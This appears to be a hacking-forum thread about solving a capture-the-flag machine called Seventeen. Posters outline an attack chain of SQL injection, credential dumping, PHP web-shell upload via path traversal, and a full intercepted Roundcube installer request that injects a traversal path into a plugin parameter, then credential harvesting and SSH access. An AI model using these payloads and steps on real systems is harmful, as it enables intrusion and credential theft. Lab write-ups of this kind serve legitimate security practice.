Anyone managed to find kavi's password in the mark's shell after the patch ?

dsfsdgsgdhs

for shell.php  put on filename=../filename.php 

to get rev shell

(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.



Almost none of the main steps described in the first pages of this thread still work, the machine has been patched 5 days ago.



The steps so far are:



1. Discover exam subdomain

2. SQLi on the id parameter

3. Dump student credentials from DB

4. Login into student panel

5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked

6 You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed with .htaccess file. So most likely the steps were supposed to be:

6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/

6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG

This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file

8. SSH into the box as Mark



Here is were I stopped.



- The file where other users have previously found the password for kavi user is not readable anymore

- The /opt/app/node_modules/ directory is not writeable anymore, so the rogue JS package cannot be just written there

- There is a Verdaccio registry locally at port 4873, I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and nor mark nor kavi have access to it). The configuration of verdaccio is not even readable (/etc/verdaccio).

- There is a whole mail stack on the machine, it is really strange that it would be completely useless for the machine to be solved.

- There is another web app on port 31225 which I am not sure what it is.

If someone finds a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/) would be nice, I am giving up on this machine because it seems to be really poorly made and at this point is just a waste of time without much learning.

thank you!
how you discover student panel? and how you find mark as username?

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.

................

thanks!

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.

yes

thanks

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.

thanks

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.

Thanks.